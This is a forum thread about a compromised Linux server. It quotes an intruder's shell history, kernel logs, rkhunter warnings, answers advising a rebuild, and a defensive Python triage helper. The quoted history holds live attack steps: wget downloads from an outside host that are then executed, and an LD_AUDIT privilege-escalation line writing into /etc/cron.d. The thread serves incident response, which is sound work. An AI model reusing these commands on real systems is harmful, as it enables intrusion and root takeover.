
I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked into this because my user is the only one with ssh access. I found this in an ftp user's .bash_history file:

w
uname -a
ls -a
sudo su
wget qiss.ucoz.de/2010/.jpg
wget qiss.ucoz.de/2010.jpg
tar xzvf 2010.jpg
rm -rf 2010.jpg
cd 2010/
ls -a
./2010
./2010x64
./2.6.31
uname -a
ls -a
./2.6.37-rc2
python rh2010.py
cd ..
ls -a
rm -rf 2010/
ls -a
wget qiss.ucoz.de/ubuntu2010_2.jpg
tar xzvf ubuntu2010_2.jpg
rm -rf ubuntu2010_2.jpg
./ubuntu2010-2
./ubuntu2010-2
./ubuntu2010-2
cat /etc/issue
umask 0  
dpkg -S /lib/libpcprofile.so 
ls -l /lib/libpcprofile.so 
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ping
gcc
touch a.sh
nano a.sh 
vi a.sh 
vim
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
nano ubuntu10.sh
ls -a
rm -rf ubuntu10.sh .  ..  a.sh  .cache  ubuntu10.sh  ubuntu2010-2
ls -a
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
ls -a
rm -rf ubuntu10.sh
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
rm -rf W2Ksp3.exe
passwd

The system is in a jail. Does it matter in the current case? What shall I do?

Thanks to everyone!!

I have done these:
  • banned the connected ssh host with iptables
  • stopped the sshd in the jail
  • saved: bash_history, syslog, dmesg, the files from the bash_history's wget lines


I installed rkhunter and unhide as well. I ran the "unhide sys" command and it reported 1 hidden process. Now I'm running rkhunter... OK.

rkhunter -c reported some warnings:

  • in the jail:
    Checking if SSH root access is allowed [ Warning ]
    Checking for syslog configuration file [ Warning ]
    Performing filesystem checks
    Checking for hidden files and directories [ Warning ]

  • host system:
    Performing filesystem checks
    Checking /dev for suspicious file types [ Warning ]
    Checking for hidden files and directories [ Warning ]

I found in dmesg and syslog that the hacker tried to do something with irda:

  • syslog:
Feb 28 22:48:41 i386 kernel: [4180166.230061] irda_init()
Feb 28 22:48:41 i386 kernel: [4180166.230077] NET: Registered protocol family 23
Feb 28 22:48:46 i386 kernel: [4180171.242169] ioctl32(2.6.31:4726): Unknown cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/pts/0
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: Called
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: /home/i is already mounted
Feb 28 22:49:33 i386 kernel: [4180218.465341] can: controller area network core (rev 20090105 abi 8)
Feb 28 22:49:33 i386 kernel: [4180218.465413] NET: Registered protocol family 29
Feb 28 22:49:33 i386 kernel: [4180218.493398] can: broadcast manager protocol (rev 20090105 t)
Feb 28 23:00:49 i386 kernel: [4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: Called
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: /home/i is already mounted
Feb 28 23:17:01 i386 CRON[10126]: (root) CMD (   cd / && run-parts --report /etc/cron.hourly)
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: Called
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: /home/i is already mounted
  • dmesg:
[4180166.230061] irda_init()
[4180166.230077] NET: Registered protocol family 23
[4180171.242169] ioctl32(2.6.31:4726): Unknown cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/pts/0
[4180218.465341] can: controller area network core (rev 20090105 abi 8)
[4180218.465413] NET: Registered protocol family 29
[4180218.493398] can: broadcast manager protocol (rev 20090105 t)
[4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team
sysadmin1138

2 Answers

Take your system down, back it up for future forensic analysis, then re-build from scratch and restore any needed data from a known good backup. Anything short of that leaves the possibility of latent malicious code being put to use.

EEAA

You could try to replicate what the hacker did and see if it could succeed at some point (did he manage to copy that "exploit" file in the cron scripts?). You probably want to run rkhunter to check if you're rooted or not, but it could hide somewhere else.

Capsule
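To follow up on Capsule's question (did the "exploit" file land in /etc/cron.d?) and to pull the indicators out of the saved .bash_history systematically rather than by eye, here is an added Python triage helper. It is my example, not code from any of the posters; the embedded history is a constructed excerpt of the lines in the question, and on a real box you would read the saved history file instead.

```python
import os
import re
import shlex

# Constructed excerpt of the attacker's .bash_history quoted in the question.
HISTORY = """\
sudo su
wget qiss.ucoz.de/2010.jpg
tar xzvf 2010.jpg
./2010
python rh2010.py
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
passwd
"""

ASSIGN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
LOADER_VARS = ("LD_AUDIT", "LD_PRELOAD", "PCPROFILE_OUTPUT")
CRON_DIRS = ("/etc/cron", "/var/spool/cron")


def triage_history(text):
    """Extract defender-relevant indicators from a bash history dump."""
    f = {"downloads": [], "executed": [], "loader_env": [],
         "cron_paths": [], "account_changes": []}
    for line in text.splitlines():
        try:
            words = shlex.split(line)
        except ValueError:          # unbalanced quotes: fall back to whitespace split
            words = line.split()
        # Peel off leading VAR=value assignments before the command word.
        env, i = {}, 0
        while i < len(words) and ASSIGN.match(words[i]):
            k, v = words[i].split("=", 1)
            env[k] = v
            i += 1
        cmd = words[i:]
        for k, v in env.items():
            if k in LOADER_VARS:
                f["loader_env"].append((k, v))
            if v.startswith(CRON_DIRS):        # a file written into a cron directory
                f["cron_paths"].append(v)
        if not cmd:
            continue
        if cmd[0] == "wget" and len(cmd) > 1:
            f["downloads"].append(cmd[-1])     # artefacts to preserve for forensics
        elif cmd[0].startswith("./") or cmd[0] in ("sh", "bash", "python", "perl"):
            f["executed"].append(" ".join(cmd))
        elif cmd[0] in ("passwd", "useradd", "usermod", "adduser"):
            f["account_changes"].append(" ".join(cmd))
    return f


def check_persistence(paths):
    """Report which cron paths named in the history actually exist on this host."""
    return {p: os.path.exists(p) for p in paths}
```

Run `check_persistence(triage_history(open(".bash_history").read())["cron_paths"])` on the saved copy; any path that exists should be preserved and inspected before the rebuild that EEAA recommends.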